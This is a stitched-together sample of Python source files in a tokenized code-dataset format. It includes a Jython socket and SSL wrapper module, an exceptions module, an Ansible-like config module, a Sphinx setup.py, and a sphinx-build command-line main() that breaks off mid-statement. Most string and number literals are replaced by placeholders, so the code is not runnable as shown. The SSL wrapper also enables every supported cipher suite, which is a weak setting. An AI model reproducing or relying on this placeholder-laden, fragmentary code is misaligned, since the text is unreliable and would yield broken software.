close ( ) <EOL> _socketmethods = ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> _delegate_methods = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ) <EOL> class _closedsocket ( object ) : <EOL> __slots__ = [ ] <EOL> def _dummy ( * args ) : <EOL> raise error ( errno . EBADF , '<STR_LIT>' ) <EOL> send = recv = recv_into = sendto = recvfrom = recvfrom_into = _dummy <EOL> __getattr__ = _dummy <EOL> _active_sockets = set ( ) <EOL> def _closeActiveSockets ( ) : <EOL> for socket in _active_sockets . copy ( ) : <EOL> try : <EOL> socket . close ( ) <EOL> except error : <EOL> msg = '<STR_LIT>' % ( socket , sys . exc_info ( ) ) <EOL> print >> sys . stderr , msg <EOL> class _socketobject ( object ) : <EOL> __doc__ = _realsocket . __doc__ <EOL> __slots__ = [ "<STR_LIT>" , "<STR_LIT>" ] + list ( _delegate_methods ) <EOL> def __init__ ( self , family = AF_INET , type = SOCK_STREAM , proto = <NUM_LIT:0> , _sock = None ) : <EOL> if _sock is None : <EOL> _sock = _realsocket ( family , type , proto ) <EOL> _sock . reference_count += <NUM_LIT:1> <EOL> elif isinstance ( _sock , _nonblocking_api_mixin ) : <EOL> _sock . reference_count += <NUM_LIT:1> <EOL> self . _sock = _sock <EOL> for method in _delegate_methods : <EOL> meth = getattr ( _sock , method , None ) <EOL> if meth : <EOL> setattr ( self , method , meth ) <EOL> _active_sockets . add ( self ) <EOL> def close ( self ) : <EOL> try : <EOL> _active_sockets . remove ( self ) <EOL> except KeyError : <EOL> pass <EOL> _sock = self . _sock <EOL> if isinstance ( _sock , _nonblocking_api_mixin ) : <EOL> _sock . close_lock . acquire ( ) <EOL> try : <EOL> _sock . reference_count -= <NUM_LIT:1> <EOL> if not _sock . reference_count : <EOL> _sock . close ( ) <EOL> self . 
_sock = _closedsocket ( ) <EOL> dummy = self . _sock . _dummy <EOL> for method in _delegate_methods : <EOL> setattr ( self , method , dummy ) <EOL> self . send = self . recv = self . sendto = self . recvfrom = self . _sock . _dummy <EOL> finally : <EOL> _sock . close_lock . release ( ) <EOL> def accept ( self ) : <EOL> sock , addr = self . _sock . accept ( ) <EOL> return _socketobject ( _sock = sock ) , addr <EOL> def dup ( self ) : <EOL> """<STR_LIT>""" <EOL> _sock = self . _sock <EOL> if not isinstance ( _sock , _nonblocking_api_mixin ) : <EOL> return _socketobject ( _sock = _sock ) <EOL> _sock . close_lock . acquire ( ) <EOL> try : <EOL> duped = _socketobject ( _sock = _sock ) <EOL> finally : <EOL> _sock . close_lock . release ( ) <EOL> return duped <EOL> def makefile ( self , mode = '<STR_LIT:r>' , bufsize = - <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> _sock = self . _sock <EOL> if not isinstance ( _sock , _nonblocking_api_mixin ) : <EOL> return _fileobject ( _sock , mode , bufsize ) <EOL> _sock . close_lock . acquire ( ) <EOL> try : <EOL> fileobject = _fileobject ( _sock , mode , bufsize ) <EOL> finally : <EOL> _sock . close_lock . release ( ) <EOL> return fileobject <EOL> family = property ( lambda self : self . _sock . family , doc = "<STR_LIT>" ) <EOL> type = property ( lambda self : self . _sock . type , doc = "<STR_LIT>" ) <EOL> proto = property ( lambda self : self . _sock . proto , doc = "<STR_LIT>" ) <EOL> _s = ( "<STR_LIT>" <EOL> ) <EOL> for _m in _socketmethods : <EOL> exec _s % ( _m , _m ) <EOL> del _m , _s <EOL> socket = SocketType = _socketobject <EOL> class _fileobject ( object ) : <EOL> """<STR_LIT>""" <EOL> default_bufsize = <NUM_LIT> <EOL> name = "<STR_LIT>" <EOL> __slots__ = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" ] <EOL> def __init__ ( self , sock , mode = '<STR_LIT:rb>' , bufsize = - <NUM_LIT:1> , close = False ) : <EOL> self . 
_sock = sock <EOL> if isinstance ( sock , _nonblocking_api_mixin ) : <EOL> sock . reference_count += <NUM_LIT:1> <EOL> self . mode = mode <EOL> if bufsize < <NUM_LIT:0> : <EOL> bufsize = self . default_bufsize <EOL> self . bufsize = bufsize <EOL> self . softspace = False <EOL> if bufsize == <NUM_LIT:0> : <EOL> self . _rbufsize = <NUM_LIT:1> <EOL> elif bufsize == <NUM_LIT:1> : <EOL> self . _rbufsize = self . default_bufsize <EOL> else : <EOL> self . _rbufsize = bufsize <EOL> self . _wbufsize = bufsize <EOL> self . _rbuf = "<STR_LIT>" <EOL> self . _wbuf = [ ] <EOL> self . _close = close <EOL> def _getclosed ( self ) : <EOL> return self . _sock is None <EOL> closed = property ( _getclosed , doc = "<STR_LIT>" ) <EOL> def close ( self ) : <EOL> try : <EOL> if self . _sock : <EOL> self . flush ( ) <EOL> finally : <EOL> if self . _sock : <EOL> if isinstance ( self . _sock , _nonblocking_api_mixin ) : <EOL> self . _sock . reference_count -= <NUM_LIT:1> <EOL> if not self . _sock . reference_count or self . _close : <EOL> self . _sock . close ( ) <EOL> elif self . _close : <EOL> self . _sock . close ( ) <EOL> self . _sock = None <EOL> def __del__ ( self ) : <EOL> try : <EOL> self . close ( ) <EOL> except : <EOL> pass <EOL> def flush ( self ) : <EOL> if self . _wbuf : <EOL> buffer = "<STR_LIT>" . join ( self . _wbuf ) <EOL> self . _wbuf = [ ] <EOL> self . _sock . sendall ( buffer ) <EOL> def fileno ( self ) : <EOL> return self . _sock . fileno ( ) <EOL> def write ( self , data ) : <EOL> data = str ( data ) <EOL> if not data : <EOL> return <EOL> self . _wbuf . append ( data ) <EOL> if ( self . _wbufsize == <NUM_LIT:0> or <EOL> self . _wbufsize == <NUM_LIT:1> and '<STR_LIT:\n>' in data or <EOL> self . _get_wbuf_len ( ) >= self . _wbufsize ) : <EOL> self . flush ( ) <EOL> def writelines ( self , list ) : <EOL> self . _wbuf . extend ( filter ( None , map ( str , list ) ) ) <EOL> if ( self . _wbufsize <= <NUM_LIT:1> or <EOL> self . _get_wbuf_len ( ) >= self . 
_wbufsize ) : <EOL> self . flush ( ) <EOL> def _get_wbuf_len ( self ) : <EOL> buf_len = <NUM_LIT:0> <EOL> for x in self . _wbuf : <EOL> buf_len += len ( x ) <EOL> return buf_len <EOL> def read ( self , size = - <NUM_LIT:1> ) : <EOL> data = self . _rbuf <EOL> if size < <NUM_LIT:0> : <EOL> buffers = [ ] <EOL> if data : <EOL> buffers . append ( data ) <EOL> self . _rbuf = "<STR_LIT>" <EOL> if self . _rbufsize <= <NUM_LIT:1> : <EOL> recv_size = self . default_bufsize <EOL> else : <EOL> recv_size = self . _rbufsize <EOL> while True : <EOL> data = self . _sock . recv ( recv_size ) <EOL> if not data : <EOL> break <EOL> buffers . append ( data ) <EOL> return "<STR_LIT>" . join ( buffers ) <EOL> else : <EOL> buf_len = len ( data ) <EOL> if buf_len >= size : <EOL> self . _rbuf = data [ size : ] <EOL> return data [ : size ] <EOL> buffers = [ ] <EOL> if data : <EOL> buffers . append ( data ) <EOL> self . _rbuf = "<STR_LIT>" <EOL> while True : <EOL> left = size - buf_len <EOL> recv_size = max ( self . _rbufsize , left ) <EOL> data = self . _sock . recv ( recv_size ) <EOL> if not data : <EOL> break <EOL> buffers . append ( data ) <EOL> n = len ( data ) <EOL> if n >= left : <EOL> self . _rbuf = data [ left : ] <EOL> buffers [ - <NUM_LIT:1> ] = data [ : left ] <EOL> break <EOL> buf_len += n <EOL> return "<STR_LIT>" . join ( buffers ) <EOL> def readline ( self , size = - <NUM_LIT:1> ) : <EOL> data = self . _rbuf <EOL> if size < <NUM_LIT:0> : <EOL> if self . _rbufsize <= <NUM_LIT:1> : <EOL> assert data == "<STR_LIT>" <EOL> buffers = [ ] <EOL> recv = self . _sock . recv <EOL> while data != "<STR_LIT:\n>" : <EOL> data = recv ( <NUM_LIT:1> ) <EOL> if not data : <EOL> break <EOL> buffers . append ( data ) <EOL> return "<STR_LIT>" . join ( buffers ) <EOL> nl = data . find ( '<STR_LIT:\n>' ) <EOL> if nl >= <NUM_LIT:0> : <EOL> nl += <NUM_LIT:1> <EOL> self . _rbuf = data [ nl : ] <EOL> return data [ : nl ] <EOL> buffers = [ ] <EOL> if data : <EOL> buffers . append ( data ) <EOL> self . 
_rbuf = "<STR_LIT>" <EOL> while True : <EOL> data = self . _sock . recv ( self . _rbufsize ) <EOL> if not data : <EOL> break <EOL> buffers . append ( data ) <EOL> nl = data . find ( '<STR_LIT:\n>' ) <EOL> if nl >= <NUM_LIT:0> : <EOL> nl += <NUM_LIT:1> <EOL> self . _rbuf = data [ nl : ] <EOL> buffers [ - <NUM_LIT:1> ] = data [ : nl ] <EOL> break <EOL> return "<STR_LIT>" . join ( buffers ) <EOL> else : <EOL> nl = data . find ( '<STR_LIT:\n>' , <NUM_LIT:0> , size ) <EOL> if nl >= <NUM_LIT:0> : <EOL> nl += <NUM_LIT:1> <EOL> self . _rbuf = data [ nl : ] <EOL> return data [ : nl ] <EOL> buf_len = len ( data ) <EOL> if buf_len >= size : <EOL> self . _rbuf = data [ size : ] <EOL> return data [ : size ] <EOL> buffers = [ ] <EOL> if data : <EOL> buffers . append ( data ) <EOL> self . _rbuf = "<STR_LIT>" <EOL> while True : <EOL> data = self . _sock . recv ( self . _rbufsize ) <EOL> if not data : <EOL> break <EOL> buffers . append ( data ) <EOL> left = size - buf_len <EOL> nl = data . find ( '<STR_LIT:\n>' , <NUM_LIT:0> , left ) <EOL> if nl >= <NUM_LIT:0> : <EOL> nl += <NUM_LIT:1> <EOL> self . _rbuf = data [ nl : ] <EOL> buffers [ - <NUM_LIT:1> ] = data [ : nl ] <EOL> break <EOL> n = len ( data ) <EOL> if n >= left : <EOL> self . _rbuf = data [ left : ] <EOL> buffers [ - <NUM_LIT:1> ] = data [ : left ] <EOL> break <EOL> buf_len += n <EOL> return "<STR_LIT>" . join ( buffers ) <EOL> def readlines ( self , sizehint = <NUM_LIT:0> ) : <EOL> total = <NUM_LIT:0> <EOL> list = [ ] <EOL> while True : <EOL> line = self . readline ( ) <EOL> if not line : <EOL> break <EOL> list . append ( line ) <EOL> total += len ( line ) <EOL> if sizehint and total >= sizehint : <EOL> break <EOL> return list <EOL> def __iter__ ( self ) : <EOL> return self <EOL> def next ( self ) : <EOL> line = self . readline ( ) <EOL> if not line : <EOL> raise StopIteration <EOL> return line <EOL> class ssl : <EOL> def __init__ ( self , plain_sock , keyfile = None , certfile = None ) : <EOL> try : <EOL> self . 
ssl_sock = self . _make_ssl_socket ( plain_sock ) <EOL> self . _in_buf = java . io . BufferedInputStream ( self . ssl_sock . getInputStream ( ) ) <EOL> self . _out_buf = java . io . BufferedOutputStream ( self . ssl_sock . getOutputStream ( ) ) <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def _make_ssl_socket ( self , plain_socket , auto_close = <NUM_LIT:0> ) : <EOL> java_net_socket = plain_socket . _get_jsocket ( ) <EOL> assert isinstance ( java_net_socket , java . net . Socket ) <EOL> host = java_net_socket . getInetAddress ( ) . getHostAddress ( ) <EOL> port = java_net_socket . getPort ( ) <EOL> factory = javax . net . ssl . SSLSocketFactory . getDefault ( ) ; <EOL> ssl_socket = factory . createSocket ( java_net_socket , host , port , auto_close ) <EOL> ssl_socket . setEnabledCipherSuites ( ssl_socket . getSupportedCipherSuites ( ) ) <EOL> ssl_socket . startHandshake ( ) <EOL> return ssl_socket <EOL> def read ( self , n = <NUM_LIT> ) : <EOL> try : <EOL> data = jarray . zeros ( n , '<STR_LIT:b>' ) <EOL> m = self . _in_buf . read ( data , <NUM_LIT:0> , n ) <EOL> if m <= <NUM_LIT:0> : <EOL> return "<STR_LIT>" <EOL> if m < n : <EOL> data = data [ : m ] <EOL> return data . tostring ( ) <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def write ( self , s ) : <EOL> try : <EOL> self . _out_buf . write ( s ) <EOL> self . _out_buf . flush ( ) <EOL> return len ( s ) <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def _get_server_cert ( self ) : <EOL> try : <EOL> return self . ssl_sock . getSession ( ) . getPeerCertificates ( ) [ <NUM_LIT:0> ] <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def server ( self ) : <EOL> cert = self . _get_server_cert ( ) <EOL> return cert . getSubjectDN ( ) . toString ( ) <EOL> def issuer ( self ) : <EOL> cert = self . _get_server_cert ( ) <EOL> return cert . getIssuerDN ( ) . 
toString ( ) <EOL> _realssl = ssl <EOL> def ssl ( sock , keyfile = None , certfile = None ) : <EOL> if hasattr ( sock , "<STR_LIT>" ) : <EOL> sock = sock . _sock <EOL> return _realssl ( sock , keyfile , certfile ) <EOL> def test ( ) : <EOL> s = socket ( AF_INET , SOCK_STREAM ) <EOL> s . connect ( ( "<STR_LIT>" , <NUM_LIT> ) ) <EOL> s . send ( "<STR_LIT>" ) <EOL> while <NUM_LIT:1> : <EOL> data = s . recv ( <NUM_LIT> ) <EOL> print data <EOL> if not data : <EOL> break <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> test ( ) </s>
class Error(Exception):
    """Common base for this module's exceptions.

    New base class: every exception below now derives from it, so callers can
    trap all module-specific failures with a single ``except Error`` while
    existing ``except <Name>`` / ``except Exception`` handlers keep working.
    The per-class docstrings are derived from the class names only (the raise
    sites are not visible here) — confirm against callers.
    """
    pass


class ConfigError(Error):
    """Raised for configuration problems (semantics inferred from name)."""
    pass


class NotLoggedInError(Error):
    """Raised when an operation requires an authenticated session."""
    pass


class ObjectNotFoundError(Error):
    """Raised when a requested object cannot be located."""
    pass


class TaskFailedError(Error):
    """Raised when a task does not complete successfully."""
    pass


class TemplateNotFoundError(Error):
    """Raised when a named template cannot be located."""
    pass


# NOTE(review): this deliberately keeps the original name even though it
# shadows the builtin NotImplementedError — renaming would break existing
# callers.  Beware: any module doing a star-import from here will have its
# bare ``raise NotImplementedError`` resolve to THIS class.
class NotImplementedError(Error):
    """Raised for functionality that is not implemented (shadows the builtin)."""
    pass
import os
import sys


def get_config(env_var, default):
    """Resolve a configuration value from the process environment.

    Returns ``os.environ[env_var]`` when *env_var* is a variable name and the
    variable is set (an empty string counts as set); returns *default* when
    *env_var* is ``None`` or the variable is absent.
    """
    if env_var is None:
        return default
    value = os.environ.get(env_var)
    return default if value is None else value


# Root of the distributed module tree.  When the interpreter exposes the
# probed sys attribute (name anonymized in this corpus), paths are anchored
# under sys.prefix; otherwise a literal fallback path is used.
if getattr(sys, "<STR_LIT>", None):
    DIST_MODULE_PATH = os.path.join(sys.prefix, '<STR_LIT>')
else:
    DIST_MODULE_PATH = '<STR_LIT>'

# Each default below can be overridden via an environment variable; the
# path-valued ones are ~-expanded so user-relative overrides work.
DEFAULT_MODULE_PATH = get_config('<STR_LIT>', os.path.join(DIST_MODULE_PATH, '<STR_LIT>'))
DEFAULT_HOST_LIST = os.path.expanduser(get_config('<STR_LIT>', os.path.join(DIST_MODULE_PATH, '<STR_LIT>', '<STR_LIT>')))
DEFAULT_PLAYBOOK = os.path.expanduser(get_config('<STR_LIT>', os.path.join(DIST_MODULE_PATH, '<STR_LIT>', '<STR_LIT>')))
DEFAULT_CALLBACK_PLUGIN_PATH = os.path.expanduser(get_config('<STR_LIT>', os.path.join(DIST_MODULE_PATH, '<STR_LIT>')))
DEFAULT_SUDO_FLAGS = get_config('<STR_LIT>', '<STR_LIT>')
<s> from setuptools import setup , find_packages <EOL> import os <EOL> import sys <EOL> from distutils import log <EOL> import sphinx <EOL> long_desc = '''<STR_LIT>''' <EOL> if sys . version_info < ( <NUM_LIT:2> , <NUM_LIT:6> ) or ( <NUM_LIT:3> , <NUM_LIT:0> ) <= sys . version_info < ( <NUM_LIT:3> , <NUM_LIT:3> ) : <EOL> print ( '<STR_LIT>' ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> requires = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> extras_require = { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT:test>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> } <EOL> if sys . platform == '<STR_LIT:win32>' : <EOL> requires . append ( '<STR_LIT>' ) <EOL> cmdclass = { } <EOL> try : <EOL> from babel . messages . pofile import read_po <EOL> from babel . messages . frontend import compile_catalog <EOL> try : <EOL> from simplejson import dump <EOL> except ImportError : <EOL> from json import dump <EOL> except ImportError : <EOL> pass <EOL> else : <EOL> class compile_catalog_plusjs ( compile_catalog ) : <EOL> """<STR_LIT>""" <EOL> def run ( self ) : <EOL> compile_catalog . run ( self ) <EOL> po_files = [ ] <EOL> js_files = [ ] <EOL> if not self . input_file : <EOL> if self . locale : <EOL> po_files . append ( ( self . locale , <EOL> os . path . join ( self . directory , self . locale , <EOL> '<STR_LIT>' , <EOL> self . domain + '<STR_LIT>' ) ) ) <EOL> js_files . append ( os . path . join ( self . directory , self . locale , <EOL> '<STR_LIT>' , <EOL> self . domain + '<STR_LIT>' ) ) <EOL> else : <EOL> for locale in os . listdir ( self . directory ) : <EOL> po_file = os . path . join ( self . directory , locale , <EOL> '<STR_LIT>' , <EOL> self . domain + '<STR_LIT>' ) <EOL> if os . path . 
exists ( po_file ) : <EOL> po_files . append ( ( locale , po_file ) ) <EOL> js_files . append ( os . path . join ( self . directory , locale , <EOL> '<STR_LIT>' , <EOL> self . domain + '<STR_LIT>' ) ) <EOL> else : <EOL> po_files . append ( ( self . locale , self . input_file ) ) <EOL> if self . output_file : <EOL> js_files . append ( self . output_file ) <EOL> else : <EOL> js_files . append ( os . path . join ( self . directory , self . locale , <EOL> '<STR_LIT>' , <EOL> self . domain + '<STR_LIT>' ) ) <EOL> for js_file , ( locale , po_file ) in zip ( js_files , po_files ) : <EOL> infile = open ( po_file , '<STR_LIT:r>' ) <EOL> try : <EOL> catalog = read_po ( infile , locale ) <EOL> finally : <EOL> infile . close ( ) <EOL> if catalog . fuzzy and not self . use_fuzzy : <EOL> continue <EOL> log . info ( '<STR_LIT>' , <EOL> po_file , js_file ) <EOL> jscatalog = { } <EOL> for message in catalog : <EOL> if any ( x [ <NUM_LIT:0> ] . endswith ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> for x in message . locations ) : <EOL> msgid = message . id <EOL> if isinstance ( msgid , ( list , tuple ) ) : <EOL> msgid = msgid [ <NUM_LIT:0> ] <EOL> jscatalog [ msgid ] = message . string <EOL> outfile = open ( js_file , '<STR_LIT:wb>' ) <EOL> try : <EOL> outfile . write ( '<STR_LIT>' ) <EOL> dump ( dict ( <EOL> messages = jscatalog , <EOL> plural_expr = catalog . plural_expr , <EOL> locale = str ( catalog . locale ) <EOL> ) , outfile , sort_keys = True ) <EOL> outfile . write ( '<STR_LIT>' ) <EOL> finally : <EOL> outfile . close ( ) <EOL> cmdclass [ '<STR_LIT>' ] = compile_catalog_plusjs <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = sphinx . 
__version__ , <EOL> url = '<STR_LIT>' , <EOL> download_url = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = long_desc , <EOL> zip_safe = False , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> platforms = '<STR_LIT>' , <EOL> packages = find_packages ( exclude = [ '<STR_LIT>' ] ) , <EOL> include_package_data = True , <EOL> entry_points = { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> ] , <EOL> } , <EOL> install_requires = requires , <EOL> extras_require = extras_require , <EOL> cmdclass = cmdclass , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> import sys <EOL> import optparse <EOL> import traceback <EOL> from os import path <EOL> from six import text_type , binary_type <EOL> from docutils . utils import SystemMessage <EOL> from sphinx import __display_version__ <EOL> from sphinx . errors import SphinxError <EOL> from sphinx . application import Sphinx <EOL> from sphinx . util import Tee , format_exception_cut_frames , save_traceback <EOL> from sphinx . util . console import red , nocolor , color_terminal <EOL> from sphinx . util . osutil import abspath , fs_encoding <EOL> from sphinx . util . pycompat import terminal_safe <EOL> USAGE = """<STR_LIT>""" % __display_version__ <EOL> EPILOG = """<STR_LIT>""" <EOL> class MyFormatter ( optparse . IndentedHelpFormatter ) : <EOL> def format_usage ( self , usage ) : <EOL> return usage <EOL> def format_help ( self , formatter ) : <EOL> result = [ ] <EOL> if self . description : <EOL> result . append ( self . format_description ( formatter ) ) <EOL> if self . option_list : <EOL> result . append ( self . format_option_help ( formatter ) ) <EOL> return "<STR_LIT:\n>" . join ( result ) <EOL> def main ( argv ) : <EOL> if not color_terminal ( ) : <EOL> nocolor ( ) <EOL> parser = optparse . OptionParser ( USAGE , epilog = EPILOG , formatter = MyFormatter ( ) ) <EOL> parser . add_option ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT:version>' , <EOL> help = '<STR_LIT>' ) <EOL> group = parser . add_option_group ( '<STR_LIT>' ) <EOL> group . add_option ( '<STR_LIT>' , metavar = '<STR_LIT>' , dest = '<STR_LIT>' , default = '<STR_LIT:html>' , <EOL> help = '<STR_LIT>' ) <EOL> group . add_option ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> group . add_option ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> group . 
add_option ( '<STR_LIT>' , metavar = '<STR_LIT>' , default = None , dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> group . add_option ( '<STR_LIT>' , metavar = '<STR_LIT:N>' , default = <NUM_LIT:1> , type = '<STR_LIT:int>' , dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> group = parser . add_option_group ( '<STR_LIT>' ) <EOL> group . add_option ( '<STR_LIT:-c>' , metavar = '<STR_LIT>' , dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> group . add_option ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> group . add_option ( '<STR_LIT>' , metavar = '<STR_LIT>' , action = '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , default = [ ] , <EOL> help = '<STR_LIT>' ) <EOL> group . add_option ( '<STR_LIT>' , metavar = '<STR_LIT>' , action = '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , default = [ ] , <EOL> help = '<STR_LIT>' ) <EOL> group . add_option ( '<STR_LIT>' , metavar = '<STR_LIT>' , action = '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , default = [ ] , <EOL> help = '<STR_LIT>' ) <EOL> group . add_option ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> group = parser . add_option_group ( '<STR_LIT>' ) <EOL> group . add_option ( '<STR_LIT>' , action = '<STR_LIT:count>' , dest = '<STR_LIT>' , default = <NUM_LIT:0> , <EOL> help = '<STR_LIT>' ) <EOL> group . add_option ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> group . add_option ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> group . add_option ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> group . add_option ( '<STR_LIT>' , metavar = '<STR_LIT>' , dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> group . 
add_option ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> group . add_option ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> group . add_option ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> try : <EOL> opts , args = parser . parse_args ( list ( argv [ <NUM_LIT:1> : ] ) ) <EOL> except SystemExit as err : <EOL> return err . code <EOL> if opts . version : <EOL> print ( '<STR_LIT>' % __display_version__ ) <EOL> return <NUM_LIT:0> <EOL> try : <EOL> srcdir = abspath ( args [ <NUM_LIT:0> ] ) <EOL> confdir = abspath ( opts . confdir or srcdir ) <EOL> if opts . noconfig : <EOL> confdir = None <EOL> if not path . isdir ( srcdir ) : <EOL> print ( '<STR_LIT>' % srcdir , <EOL> file = sys . stderr ) <EOL> return <NUM_LIT:1> <EOL> if not opts . noconfig and not path . isfile ( path . join ( confdir , '<STR_LIT>' ) ) : <EOL> print ( '<STR_LIT>' , <EOL> file = sys . stderr ) <EOL> return <NUM_LIT:1> <EOL> outdir = abspath ( args [ <NUM_LIT:1> ] ) <EOL> if srcdir == outdir : <EOL> print ( '<STR_LIT>' , <EOL> file = sys . stderr ) <EOL> return <NUM_LIT:1> <EOL> except IndexError : <EOL> parser . print_help ( ) <EOL> return <NUM_LIT:1> <EOL> except UnicodeError : <EOL> print ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % fs_encoding , file = sys . stderr ) <EOL> return <NUM_LIT:1> <EOL> filenames = args [ <NUM_LIT:2> : ] <EOL> err = <NUM_LIT:0> <EOL> for filename in filenames : <EOL> if not path . isfile ( filename ) : <EOL> print ( '<STR_LIT>' % filename , file = sys . stderr ) <EOL> err = <NUM_LIT:1> <EOL> if err : <EOL> return <NUM_LIT:1> <EOL> try : <EOL> locale = __import__ ( '<STR_LIT>' ) <EOL> likely_encoding = locale . getpreferredencoding ( ) <EOL> except Exception : <EOL> likely_encoding = None <EOL> if opts . force_all and filenames : <EOL> print ( '<STR_LIT>' , file = sys . 
stderr ) <EOL> return <NUM_LIT:1> <EOL> if opts . nocolor : <EOL> nocolor ( ) <EOL> doctreedir = abspath ( opts . doctreedir or path . join ( outdir , '<STR_LIT>' ) ) <EOL> status = sys . stdout <EOL> warning = sys . stderr <EOL> error = sys . stderr <EOL> if opts . quiet : <EOL> status = None <EOL> if opts . really_quiet : <EOL> status = warning = None <EOL> if warning and opts . warnfile : <EOL> try : <EOL> warnfp = open ( opts . warnfile , '<STR_LIT:w>' ) <EOL> except Exception as exc : <EOL> print ( '<STR_LIT>' % <EOL> ( opts . warnfile , exc ) , file = sys . stderr ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> warning = Tee ( warning , warnfp ) <EOL> error = warning <EOL> confoverrides = { } <EOL> for val in opts . define : <EOL> try : <EOL> key , val = val . split ( '<STR_LIT:=>' ) <EOL> except ValueError : <EOL> print ( '<STR_LIT>' , <EOL> file = sys . stderr ) <EOL> return <NUM_LIT:1> <EOL> if likely_encoding and isinstance ( val , binary_type ) : <EOL> try : <EOL> val = val . decode ( likely_encoding ) <EOL> except UnicodeError : <EOL> pass <EOL> confoverrides [ key ] = val <EOL> for val in opts . htmldefine : <EOL> try : <EOL> key , val = val . split ( '<STR_LIT:=>' ) <EOL> except ValueError : <EOL> print ( '<STR_LIT>' , <EOL> file = sys . stderr ) <EOL> return <NUM_LIT:1> <EOL> try : <EOL> val = int ( val ) <EOL> except ValueError : <EOL> if likely_encoding and isinstance ( val , binary_type ) : <EOL> try : <EOL> val = val . decode ( likely_encoding ) <EOL> except UnicodeError : <EOL> pass <EOL> confoverrides [ '<STR_LIT>' % key ] = val <EOL> if opts . nitpicky : <EOL> confoverrides [ '<STR_LIT>' ] = True <EOL> app = None <EOL> try : <EOL> app = Sphinx ( srcdir , confdir , outdir , doctreedir , opts . builder , <EOL> confoverrides , status , warning , opts . freshenv , <EOL> opts . warningiserror , opts . tags , opts . verbosity , opts . jobs ) <EOL> app . build ( opts . force_all , filenames ) <EOL> return 